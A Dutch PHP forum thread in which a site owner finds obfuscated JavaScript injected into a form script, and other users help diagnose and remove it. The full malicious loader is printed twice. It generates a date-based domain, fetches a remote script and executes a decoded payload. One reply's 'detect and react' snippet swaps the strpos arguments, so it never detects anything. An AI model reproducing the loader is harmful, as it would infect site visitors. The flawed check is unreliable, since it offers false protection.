syntax error

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Senior Front-End Developer

Als Senior Front-End Developer bij Coolblue verbeter je de gebruiksvriendelijkheid van onze webshop voor miljoenen klanten. Wat doe je als Senior Front-End Developer bij Coolblue? Als Senior Front-end Developer werk je aan de gebruiksvriendelijkheid van onze webshop voor miljoenen klanten. Je vindt het leuk om samen te werken met de UX designer om stories op te pakken. Daarnaast ben je trots op je werk en verwelkomt alle feedback. Ook Senior Front-end Developer worden bij Coolblue? Lees hieronder of het bij je past. Dit vind je leuk om te doen Verbeteren van de gebruiksvriendelijkheid van onze webshop voor miljoenen klanten. Nadenken

Bekijk vacature »

Database Developer

Functieomschrijving Wat ga je doen? Als developer ben jij samen met een gemotiveerd team van 10 collega’s verantwoordelijk voor het creëren van aangemeten software voor klanten. Je bent klantvriendelijk en oplossingsgericht ingesteld, omdat het essentieel is om de klanten zo goed mogelijk te helpen met hun uitdagingen. Het is mogelijk om vanuit huis je werkzaamheden uit te voeren, maar het is ook prettig als je in de omgeving van Tilburg woont om naar het kantoor te kunnen komen. Vind jij het leuk om jouw creatieve vaardigheden te benutten om complexe systemen te ontwikkelen? Lees dan snel verder! Bedrijfsprofiel Voor wie

Bekijk vacature »

.NET developer

Functie Als .NET developer start jij in een ontwikkelteam met 15 developers en twee testers. Samen zijn jullie verantwoordelijk voor financiële applicaties met meer dan 50.000 gebruikers. Een deel van het team is verantwoordelijk voor de webapplicaties van deze organisatie. Ook zijn er twee app ontwikkelaars werkzaam in het team die zich focussen op de mobiele applicatie. Als .NET ontwikkelaar ga jij aan de slag met de webapplicaties van deze organisatie. Hierbij maak jij o.a. gebruik van C# .NET, ASP.NET, T-SQL, Angular en TypeScript. De nadruk van jouw functie ligt wel op de backend van de applicatie. Wat jouw functie

Bekijk vacature »

SQL Database developer

Functie omschrijving Wil jij meewerken aan het creëren van slimme software om magazijnen als een geoliede machine te laten lopen? Wij zoeken een zorgvuldig persoon, iemand die niet snel de hand omdraait voor complexe algoritmes. Denk jij dat jij de SQL ontwikkelaar bent die wij zoeken? Lees snel verder en wie weet zitten we binnenkort samen aan tafel! Jouw werkzaamheden zullen er als volgt uitzien: Je houdt je bezig met het ontwerpen en ontwikkelen van MS SQL server databases, dit doe je met T-SQL als programmeer laag. Je gaat aan high-end software oplossingen werken, dit doe je voor de optimalisatie

Bekijk vacature »

Medior/senior front end developer

Functie Vanwege de groei binnen het bedrijf zijn ze op zoek naar een Technische front end developer. Momenteel hun front end back end team gescheiden aan het werk. Hier willen ze verandering in krijgen. Omdat ook veel interne applicaties ontwikkeld worden zoeken ze iemand die hen kan helpen om de interne applicaties te voorzien van de juiste Vue.js componenten. Zodoende willen ze de interactie tussen front end en back end versoepelen en de volgende stap binnen het platform gaan zetten. Deze componenten die jij ontwikkeld zullen in elk project gebruikt worden. Het back end team bestaat momenteel uit 8 ontwikkelaars

Bekijk vacature »

Lead javascript developer Node.js React

Functie Als fullstack JavaScript developer vind jij het uitdagend om op basis van concrete klantvragen nieuwe functionaliteiten te ontwikkelen. Bij voorkeur worden deze functionaliteiten op een bepaalde manier geprogrammeerd, zodat ze door meerdere klanten te gebruiken zijn. Je hebt dus vaak te maken met abstracte vraagstukken. Om dit te kunnen realiseren sta je nauw in contact met de product owner en/of klant. Je bent niet alleen onderdeel van het development team, maar hebt ook vaak contact met de product-owner en/of klanten om daardoor inzichten te verzamelen die leiden tot productverbeteringen. • Inzichten verzamelen bij de klant en/of product owner •

Bekijk vacature »

Team Lead Java Developer

Functie Wat ga je doen als Java developer? Als Team Lead Java Developer draag een grote verantwoordelijk je stuurt ontwikkelaars aan en staat dagelijks in contact met jou ICT Manager. De team Bestaat uit front-end en backend systemen. Je ben in staat op hoog niveau de technische vak te bepalen en ook te bewaren. Je dag zie er als volgt uit, ontwikkelen van nieuwe en bestaande applicaties, het uitvoeren van processen en analyses en het beschrijven van functioneel ontwerpen. Ook zal samen met jouw Tester applicaties gaan testen door middel van peer reviews en het leveren van support aan gebruikers

Bekijk vacature »

Front-end Developer

Gezellige team, passie en een groene toekomst! Lees hier de vacature van Front-end Developer bij All in Power! All in power heeft zich tot doel gesteld écht bij te dragen aan de energietransitie. Dit doen wij door de markt voor energie volledig op zijn kop te zetten. Producenten van schone (wind- of zonne-)energie verkopen via ons platform hun energie rechtstreeks aan gebruikers. Of dit nu huishoudens, bedrijven of bijvoorbeeld laadpalen zijn ons platform maakt het uitwisselen van energie mogelijk. Zo maken we de business case van onze klanten veel sterker en loont het om (meer) te investeren in vergroening voor

Bekijk vacature »

Dynamics Ontwikkelaar

Dit ga je doen Ontwikkelen van Dynamics 365 voor de interne uitrol; Samen met de consultants sparren met klanten over de wensen en eisen; Ontwikkelen van Dynamics 365 voor verschillende grote klanten; Technische analyse en testen; Meedenken over het gebruik en de richting van Dynamics binnen de organisatie. Hier ga je werken Onze opdrachtgever, gevestigd in regio Eindhoven, levert een compleet dienstenpakket op het gebied van IT. Zij pakken verschillende (complexe) vraagstukken van grote organisaties op. De sfeer intern is gezellig en informeel. Men houdt van hard werken maar gezelligheid door middel van een borrel of gezamenlijke lunch komt er

Bekijk vacature »

Junior PHP Developer

Functieomschrijving Junior PHP Developer gezocht! Voor een opdrachtgever in de regio Gelderland zijn wij op zoek naar een Junior PHP Developer die onderdeel gaat worden van het ontwikkelingsteam van deze organisatie. In deze functie ga jij aan de slag met het schrijven van software voor de aansturing van en het managen van windparken en bijbehorende onderdelen. Hiernaast ga jij je bezighouden met het ontwikkelen, testen en onderhouden van diverse webapplicaties. Het team waarin je komt te werken bestaat uit 3 developers, hierdoor krijg je veel verantwoordelijkheid en de kans om jezelf verder te ontwikkelen. Er wordt echter wel van je

Bekijk vacature »

SQL ontwikkelaar

Functieomschrijving Voor een gave werkgever in regio Breda zijn wij per direct op zoek naar een SQL ontwikkelaar/ functioneel consultant. Hier wordt jij mede verantwoordelijk voor zowel de design en implementatie van SQL-databases als voor het verstaan van de processen van klanten naar het vertalen van deze processen naar IT-oplossingen. Jouw takenpakket komt als volgt uit te zien: Je test de ontwikkelde oplossingen om er zeker van te zijn dat deze voldoen aan de functionele specificaties en de behoeften van de organisatie; Je ontwerpt, ontwikkelt en implementeert SQL-databases om de data behoeften van de organisatie te ondersteunen; Je stelt op

Bekijk vacature »

Software developer

Functie Momenteel zijn ze op zoek naar een Software developer die, veelal fullstack, mee gaat werken aan de ontwikkeling van de producten en zo helpt aan de uitvoering van hun ontwikkelprojecten. Je komt te werken binnen hun development team bestaande uit 6 ontwikkelaars. Ze staan zowel open voor meer junior als medior/senior developers. Je kunt snel veel verantwoordelijkheid krijgen en doorgroeien binnen het bedrijf. Bovendien ben je betrokken bij het bepalen van de product roadmap en de inbreng van (nieuwe) technologieën. De applicaties waaraan je werk worden gebruikt op onderwijsinstellingen door heel Nederland. De tech-stack bestaat voornamelijk uit Laravel (PHP),

Bekijk vacature »

.NET developer

Functie Als .NET developer werk jij samen in een multidisciplinair ontwikkel team met 1-2 Senior .NET developers, twee front-end developers, Data Scientists en één UX designer. Als team werken jullie aan het ontwikkelen van een Cloud based applicatie en aan het stabieler maken van deze applicatie. Ook unit testing gaat erg belangrijk worden in jouw nieuwe functie. Samen met de Senior .NET ontwikkelaar wordt jij verantwoordelijk voor het ontwikkelen van de API. Jullie werken met veel data en incidenteel komen er ook data vraagstukken en zullen er wat queries gedraaid moeten worden. Dit betekend dat jij veel gaat werken met

Bekijk vacature »

Python developer Consultancy

Functie Als Python developer bij deze organisatie werk je voor verschillende klanten. Doordat de oprichter een groot netwerk heeft kun je zelf voorkeuren uitspreken in het type projecten dat je wilt gaan doen. Zo zijn er bijvoorbeeld langdurige of juist korte projecten, maar is ook het type klant, of project bespreekbaar. Werk jij bijvoorbeeld graag aan een nieuw, state-of-the-art web portaal of ben je liever betrokken bij een migratietraject van een bestaande applicatie? Wij gaan voor jou aan de slag! Eisen • Je bent een gedreven developer met sterke voorkeur voor Python • Je bent meer dan een codeklopper •

Bekijk vacature »

Java Developer

Dit ga je doen Ontwerpen en bouwen van nieuwe functionaliteiten binnen de complexe omgeving; Proactief de processen kwalitatief en efficient inrichten; Opzetten van Unit Tests; Code Reviews; Regie nemen voor innovatieve projecten; Landschap beheren en de bijbehorende ketens hierbij in het oog houden. Hier ga je werken De organisatie is actief binnen de financiele branche en heeft een IT afdeling van circa 450 man. De organisatie voorziet de maatschappij binnen de financiele dienstverlening en is gedurende de jaren een onmisbare schakel geworden. Het is een high profile organisatie waar ze veel te maken hebben met veranderingen voortkomend uit maatschappelijke ontwikkelingen,

Bekijk vacature »
Eric O

Eric O

15/05/2014 15:04:00
Quote Anchor link
Dag allemaal,

er is iets raars gebeurd op mijn webserver (hacking?)
als ik een formulier verstuur, maak ik gebruik van een php tool. Dat werkte tot 3 dagen geleden perfect.
ALs ik nu echter op de knop verstuur klik, verschint de volgende melding:

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/o5148okp/public_html/phpforms/index.php on line 525

Ik ben gaan zien op de pagina naar lijn 525, maar voor mij is dit hocus pocus. Wie ziet de fout??
Bedankt voor jullie hulp!



<body><script>function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,335633487,1661365465,4195302755,2366115317,997073096,1281953886,3579855332,2724688242,1006888145,1258607687,3524101629,2768942443,901097722,1119000684,3686517206,2898065728,853044451,1172266101,3705015759,2882616665,651767980,1373503546,3369554304,3218104598,565507253,1454621731,3485111705,3099436303,671266974,1594198024,3322730930,2970347812,795835527,1483230225,3244367275,3060149565,1994146192,31158534,2563907772,4023717930,1907459465,112637215,2680153253,3904427059,2013776290,251722036,2517215374,3775830040,2137656763,141376813,2439277719,3865271297,1802195444,476864866,2238001368,4066508878,1812370925,453092731,2181625025,4111451223,1706088902,314042704,2344532202,4240017532,1658658271,366619977,2362670323,4224994405,1303535960,984961486,2747007092,3569037538,1256170817,1037604311,2765210733,3554079995,1131014506,879679996,2909243462,3663771856,1141124467,855842277,2852801631,3708648649,1342533948,654459306,3188396048,3373015174,1466479909,544179635,3110523913,3462522015,1591671054,702138776,2966460450,3352799412,1504918807,783551873,3082640443,3233442989,3988292384,2596254646,62317068,1957810842,3939845945,2647816111,81470997,1943803523,3814918930,2489596804,225274430,2053790376,3826175755,2466906013,167816743,2097651377,4027552580,2265490386,503444072,1762050814,4150417245,2154129355,426522225,1852507879,4275313526,2312317920,282753626,1742555852,4189708143,2394877945,397917763,1622183637,3604390888,2714866558,953729732,1340076626,3518719985,2797360999,1068828381,1219638859,3624741850,2936675148,906185462,1090812512,3747672003,2825379669,829329135,1181335161,3412177804,3160834842,628085408,1382605366,3423369109,3138078467,570562233,1426400815,3317316542,2998733608,733239954,1555261956,3268935591,3050360625,752459403,1541320221,2607071920,3965973030,1969922972,40735498,2617837225,3943577151,1913087877,83908371,2512341634,3803740692,2075208622,213261112,2463272603,3855990285,2094854071,198958881,2262029012,4057260610,1759359992,534414190,2176718541,4139329115,1873836001,414664567,2282248934,4279200368,1711684554,285281116,2405801727,4167216745,1634467795,376229701,2685067896,3608007406,1308918612,956543938,2808555105,3495958263,1231636301,1047427035,2932959818,3654703836,1088359270,936918000,2847714899,3736837829,1202900863,817233897,3183342108,3401237130,1404277552,615818150,3134207493,3453421203,1423857449,601450431,3009837614,3294710456,1567103746,711928724,3020668471,3272380065,1510334235,755167117];var crc = crc ^ (-1);for(var i=0, iTop=str.length; i<iTop; i++) {crc = ( crc >>> 8 ) ^ table[( crc ^ str.charCodeAt( i ) ) & 0xFF];}return (crc ^ (-1)) >>> 0;};function dbc(s) {var e={},i,k,v=[],r='',w=String.fromCharCode;var n=[[65,91],[97,123],[48,58],[43,44],[47,48]];for(z in n){for(i=n[z][0];i<n[z][1];i++){v.push(w(i));}}for(i=0;i<64;i++){e[v]=i;}for(i=0;i<s.length;i+=72){var b=0,c,x,l=0,o=s.substring(i,i+72);for(x=0;x<o.length;x++){c=e[o.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){r+=w((b>>>(l-=8))%256);}}}return r;};function runonload(){if(!document.body){setTimeout(runonload, 50);}else {var s=document.createElement("SCRIPT");s.src="http://" + hashdate().toString(16) + ".eu/script.html?"+Math.random();document.body.appendChild(s); }};window.cback=function(p){var s = document.createElement("SCRIPT");s.text = dbc(p).replace(/\0+/,'');document.body.appendChild(s);};runonload(); </script>
&nbsp;<br><br>
<blockquote>
<h2 style='color: red;'>There appears to be a system error.</h2>
You can try to refresh the page by clicking
<a href=\"javascript:window.location=window.location;\">here</a>.
 
PHP hulp

PHP hulp

20/04/2024 02:39:22
 
- Ariën  -
Beheerder

- Ariën -

15/05/2014 15:13:24
Quote Anchor link
Ik gok dat die JavaScript geïnjecteerd in in je PHP-code, waarmee je PHP-code-systax niet meer klopt.
Kan je geen backup terug zetten waarna je uit kan zoeken hoe het lek misbruikt is?
Gewijzigd op 15/05/2014 15:14:39 door - Ariën -
 
Ivo P

Ivo P

15/05/2014 15:13:47
Quote Anchor link
is dit een stuk uit je script dat je kent / dat daar hoort te staan?

maw: is dit jouw script, of heeft iemand daar in lopen knoeien?

Het is namelijk op z'n minst een ondoorzichtig stuk code dat iets probeert te doen me een toe te voegen stuk javascript, waarbij een externe url betrokken is (waarbij de domainnaam afhankelijk is van de datum?)

Zeker als dit voor jou onverwacht optreedt, dan zou ik denken aan een "hacker" / "scriptkiddie"

wanneer is de file voor het laatst gewijzigd?
IS hij gelijk aan je backup?
 
Eric O

Eric O

15/05/2014 15:36:29
Quote Anchor link
ik heb mijn service provide gevraagd een back up terug tezetten van 3 dagen geleden toen het wel nog werkte, maar ze hebben vannacht een nieuwe back up gestart, die oude is dus overschreven. Helaas. Ik vrees dat ik de tool opnieuw moet installeren.
 
Michael -

Michael -

15/05/2014 15:39:29
Quote Anchor link
> maar ze hebben vannacht een nieuwe back up gestart, die oude is dus overschreven.

Hé? Vreemde provider om maar één backup te maken in de zoveel dagen of ligt dat aan mij? Op m'n werk wordt er elke nacht een backup gemaakt en zijn er altijd 7 beschikbaar (rest op tape) dus je kan makkelijk een week terug. Dacht dat dat vrij normaal was.

Je hebt de bestanden ook niet lokaal op je pc opgeslagen? Of werk je altijd online. Dat eerste is sowieso aan te raden.
Gewijzigd op 15/05/2014 16:02:51 door Michael -
 
Eric O

Eric O

15/05/2014 20:34:22
Quote Anchor link
Ik heb het volledige script nu verwijderd en bij een formulier werkt het terug. Bij een ander formiulier worden de gegevens ook verstuurd , maar wordt ik nog niet doorgestuurd naar de pagina die ik heb ingesteld, die moet verschijnen als het form verstuurd wordt.
Ik zoek verder vanavond.

Toevoeging op 15/05/2014 21:01:02:

Ik heb mijn cache vd browser nog eens geledigd en een paar testen gedaan. Alle formulieren werken terug zoals het moet na verwijdering van het script: Heb mijn ftp paswoorden gewijzigd. Ik vraag me toch af hoe dat script erop is gekomen..tja..

onderstaand script was dus de boosdoener..


<script>function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,335633487,1661365465,4195302755,2366115317,997073096,1281953886,3579855332,2724688242,1006888145,1258607687,3524101629,2768942443,901097722,1119000684,3686517206,2898065728,853044451,1172266101,3705015759,2882616665,651767980,1373503546,3369554304,3218104598,565507253,1454621731,3485111705,3099436303,671266974,1594198024,3322730930,2970347812,795835527,1483230225,3244367275,3060149565,1994146192,31158534,2563907772,4023717930,1907459465,112637215,2680153253,3904427059,2013776290,251722036,2517215374,3775830040,2137656763,141376813,2439277719,3865271297,1802195444,476864866,2238001368,4066508878,1812370925,453092731,2181625025,4111451223,1706088902,314042704,2344532202,4240017532,1658658271,366619977,2362670323,4224994405,1303535960,984961486,2747007092,3569037538,1256170817,1037604311,2765210733,3554079995,1131014506,879679996,2909243462,3663771856,1141124467,855842277,2852801631,3708648649,1342533948,654459306,3188396048,3373015174,1466479909,544179635,3110523913,3462522015,1591671054,702138776,2966460450,3352799412,1504918807,783551873,3082640443,3233442989,3988292384,2596254646,62317068,1957810842,3939845945,2647816111,81470997,1943803523,3814918930,2489596804,225274430,2053790376,3826175755,2466906013,167816743,2097651377,4027552580,2265490386,503444072,1762050814,4150417245,2154129355,426522225,1852507879,4275313526,2312317920,282753626,1742555852,4189708143,2394877945,397917763,1622183637,3604390888,2714866558,953729732,1340076626,3518719985,2797360999,1068828381,1219638859,3624741850,2936675148,906185462,1090812512,3747672003,2825379669,829329135,1181335161,3412177804,3160834842,628085408,1382605366,3423369109,3138078467,570562233,1426400815,3317316542,2998733608,733239954,1555261956,3268935591,3050360625,752459403,1541320221,2607071920,3965973030,1969922972,40735498,2617837225,3943577151,1913087877,83908371,2512341634,3803740692,2075208622,213261112,2463272603,3855990285,2094854071,198958881,2262029012,4057260610,1759359992,534414190,2176718541,4139329115,1873836001,414664567,2282248934,4279200368,1711684554,285281116,2405801727,4167216745,1634467795,376229701,2685067896,3608007406,1308918612,956543938,2808555105,3495958263,1231636301,1047427035,2932959818,3654703836,1088359270,936918000,2847714899,3736837829,1202900863,817233897,3183342108,3401237130,1404277552,615818150,3134207493,3453421203,1423857449,601450431,3009837614,3294710456,1567103746,711928724,3020668471,3272380065,1510334235,755167117];var crc = crc ^ (-1);for(var i=0, iTop=str.length; i<iTop; i++) {crc = ( crc >>> 8 ) ^ table[( crc ^ str.charCodeAt( i ) ) & 0xFF];}return (crc ^ (-1)) >>> 0;};function dbc(s) {var e={},i,k,v=[],r='',w=String.fromCharCode;var n=[[65,91],[97,123],[48,58],[43,44],[47,48]];for(z in n){for(i=n[z][0];i<n[z][1];i++){v.push(w(i));}}for(i=0;i<64;i++){e[v]=i;}for(i=0;i<s.length;i+=72){var b=0,c,x,l=0,o=s.substring(i,i+72);for(x=0;x<o.length;x++){c=e[o.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){r+=w((b>>>(l-=8))%256);}}}return r;};function runonload(){if(!document.body){setTimeout(runonload, 50);}else {var s=document.createElement("SCRIPT");s.src="http://" + hashdate().toString(16) + ".eu/script.html?"+Math.random();document.body.appendChild(s); }};window.cback=function(p){var s = document.createElement("SCRIPT");s.text = dbc(p).replace(/\0+/,'');document.body.appendChild(s);};runonload(); </script>
 
Ger van Steenderen
Tutorial mod

Ger van Steenderen

15/05/2014 21:33:51
Quote Anchor link
Heb je ergens iets waar html code ingevoerd kan worden?
Gebruik dan striptags()
Waarbij tussen de haakjes een comma gescheiden string kunt opgeven voor de tags die genegeerd moeten worden:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?php
$sanitized
= strip_tags($textarea, '<p><br>');
?>

Of detect and react:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
<?php
if (strpos('<script', $textarea) !== false) {
    header('Location: www.idiots.com');
}

?>
Gewijzigd op 15/05/2014 21:39:51 door Ger van Steenderen
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.